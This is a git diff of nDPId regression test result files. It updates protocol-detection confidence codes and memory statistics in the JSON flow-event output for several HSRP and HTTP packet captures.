00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":80,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":19,"global_ts_msec":1126551971931} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -25,9 +25,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872627 bytes -~~ total memory freed........: 5872627 bytes -~~ total allocations/frees...: 118126/118126 +~~ total memory allocated....: 6006261 bytes +~~ total memory freed........: 6006261 bytes +~~ total allocations/frees...: 120888/120888 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 676 chars 
diff --git a/test/results/hsrp2.pcap.out b/test/results/hsrp2.pcap.out
index 2144638ae..e2ee0dccb 100644
--- a/test/results/hsrp2.pcap.out
+++ b/test/results/hsrp2.pcap.out
@@ -2,12 +2,12 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"hsrp2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1643795481192} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643795481192,"flow_last_seen":1643795481192,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481192,"l3_proto":"ip4","src_ip":"10.52.220.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643795481192,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1643795481192,"pkt":"AQBeAABmcA9q7\/W\/CABFwABQAAAAAP8R88QKNNx94AAAZgfBB8EAPOmuASgCAAUEA5hwD2rv9b8AAABaAAALuAAAJxAKNNx+AAAAAAAAAAAAAAAAAwhjaXNjbwAAAA=="} 
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643795481192,"flow_last_seen":1643795481192,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481192,"l3_proto":"ip4","src_ip":"10.52.220.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643795481192,"flow_last_seen":1643795481192,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481192,"l3_proto":"ip4","src_ip":"10.52.220.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643795481220,"flow_last_seen":1643795481220,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481220,"l3_proto":"ip4","src_ip":"10.52.253.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643795481220,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1643795481220,"pkt":"AQBeAABmAAAMn\/BnCABFwABQAAAAAP8R0sQKNP194AAAZgfBB8EAPKnLASgCAAYEAGdwD2rv9b8AAABuAAALuAAAJxAKNP1+AAAAAAAAAAAAAAAAAwhjaXNjbwAAAA=="} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643795481220,"flow_last_seen":1643795481220,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481220,"l3_proto":"ip4","src_ip":"10.52.253.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643795481220,"flow_last_seen":1643795481220,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481220,"l3_proto":"ip4","src_ip":"10.52.253.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643795481192,"flow_last_seen":1643795481192,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481220,"l3_proto":"ip4","src_ip":"10.52.220.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643795481220,"flow_last_seen":1643795481220,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481220,"l3_proto":"ip4","src_ip":"10.52.253.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643795481220,"flow_last_seen":1643795481220,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481220,"l3_proto":"ip4","src_ip":"10.52.253.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643795481192,"flow_last_seen":1643795481192,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481220,"l3_proto":"ip4","src_ip":"10.52.220.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":104,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1643795481220} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/2 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870505 bytes -~~ total memory freed........: 5870505 bytes -~~ total allocations/frees...: 118118/118118 +~~ total memory allocated....: 6004139 bytes +~~ total memory freed........: 6004139 bytes +~~ total allocations/frees...: 120880/120880 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 678 chars diff --git a/test/results/hsrp2_ipv6.pcapng.out b/test/results/hsrp2_ipv6.pcapng.out index 8d51790ca..937b3a6e9 100644 
--- a/test/results/hsrp2_ipv6.pcapng.out
+++ b/test/results/hsrp2_ipv6.pcapng.out
@@ -2,16 +2,16 @@ 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1589369101819} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589369101819,"flow_last_seen":1589369101819,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1589369101819,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1589369101819,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":72,"pkt_l4_len":14,"thread_ts_msec":1589369101819,"pkt":"MzMAAABmqrvMAAEggQAAEIbdbgAAAAAOEf\/+gAAAAAAAAAAAAAAAAAAB\/wIAAAAAAAAAAAAAAAAAZgftB+0ADvAIAgQAAAAB"} 
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589369101819,"flow_last_seen":1589369101819,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1589369101819,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589369101819,"flow_last_seen":1589369101819,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1589369101819,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 
00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589369104269,"flow_last_seen":1589369104269,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1589369104269,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1589369104269,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":72,"pkt_l4_len":14,"thread_ts_msec":1589369104269,"pkt":"MzMAAABmqrvMAAIggQAAEIbdbgAAAAAOEf\/+gAAAAAAAAAAAAAAAAAAC\/wIAAAAAAAAAAAAAAAAAZgftB+0ADvAHAgQAAAAB"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589369104269,"flow_last_seen":1589369104269,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1589369104269,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589369104269,"flow_last_seen":1589369104269,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1589369104269,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1589369122912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":138,"pkt_l4_len":80,"thread_ts_msec":1589369122912,"pkt":"MzMAAABmqrvMAAEggQAAEIbdbgAAAABQEf\/+gAAAAAAAAAAAAAAAAAAB\/wIAAAAAAAAAAAAAAAAAZgftB+0AUK+YASgCAAQGABCqu8wAASAAAABpAAAnEAAATiD+gAAAAAAAAAAFc\/\/+oAAQBBwBAAAAAAAAAQAAAABR0exRqzRQmrLjMYjKT+47"} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1589369125824,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":138,"pkt_l4_len":80,"thread_ts_msec":1589369125824,"pkt":"MzMAAABmqrvMAAIggQAAEIbdbgAAAABQEf\/+gAAAAAAAAAAAAAAAAAAC\/wIAAAAAAAAAAAAAAAAAZgftB+0AUAFOASgCAAQGABCqu8wAAiAAAABkAAAnEAAATiD+gAAAAAAAAAAFc\/\/+oAAQBBwBAAAAAAAAAgAAAAA6x1WuKROwiNJvQ30Zxepz"} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1589369130453,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":72,"pkt_l4_len":14,"thread_ts_msec":1589369130453,"pkt":"MzMAAABmqrvMAAEggQAAEIbdbgAAAAAOEf\/+gAAAAAAAAAAAAAAAAAAB\/wIAAAAAAAAAAAAAAAAAZgftB+0ADvAIAgQAAAAB"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1589369131526,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":72,"pkt_l4_len":14,"thread_ts_msec":1589369131526,"pkt":"MzMAAABmqrvMAAIggQAAEIbdbgAAAAAOEf\/+gAAAAAAAAAAAAAAAAAAC\/wIAAAAAAAAAAAAAAAAAZgftB+0ADvAHAgQAAAAB"} -00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1589369104269,"flow_last_seen":1589369235852,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":900,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1589369240383,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 
-00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1589369101819,"flow_last_seen":1589369240383,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":1098,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1589369240383,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1589369104269,"flow_last_seen":1589369235852,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":900,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1589369240383,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 
+00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1589369101819,"flow_last_seen":1589369240383,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":1098,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1589369240383,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":36,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","packets-captured":36,"packets-processed":36,"total-skipped-flows":0,"total-l4-payload-len":1998,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1589369240383} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 36/36 
@@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871491 bytes -~~ total memory freed........: 5871491 bytes -~~ total allocations/frees...: 118152/118152 +~~ total memory allocated....: 6005125 bytes +~~ total memory freed........: 6005125 bytes +~~ total allocations/frees...: 120914/120914 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 468 chars ~~ json string max len.......: 811 chars diff --git a/test/results/http-crash-content-disposition.pcap.out b/test/results/http-crash-content-disposition.pcap.out index 4cf3ff2d0..76e09bb2d 100644 --- a/test/results/http-crash-content-disposition.pcap.out +++ b/test/results/http-crash-content-disposition.pcap.out 
@@ -4,8 +4,8 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1492518365663,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1492518365663,"pkt":"RQAAPNS7QABABvZlwKgAZ66BAArH4wBQe0WpbgAAAACgAjkINI0AAAIEBbQEAggKABR91QAAAAABAwMG"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492518365767,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1492518365767,"pkt":"RQAAPAAAQAAtBt4hroEACsCoAGcAUMfjkVcfantFqW+gEjiQ\/PYAAAIEBawEAggKK6FboQAUfdUBAwMH"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492518365789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1492518365789,"pkt":"RQAANNS8QABABvZswKgAZ66BAArH4wBQe0Wpb5FXH2uAEADlY08AAAEBCAoAFH3sK6FboQ=="} 
-00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492518365663,"flow_last_seen":1492518365809,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1492518365809,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"174.129.0.10","src_port":51171,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"khu.sh","url":"khu.sh\/imessages.php?songify_a=3h248fIbwJ&new","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1492518365663,"flow_last_seen":1492518365968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2844,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1492518365968,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"174.129.0.10","src_port":51171,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
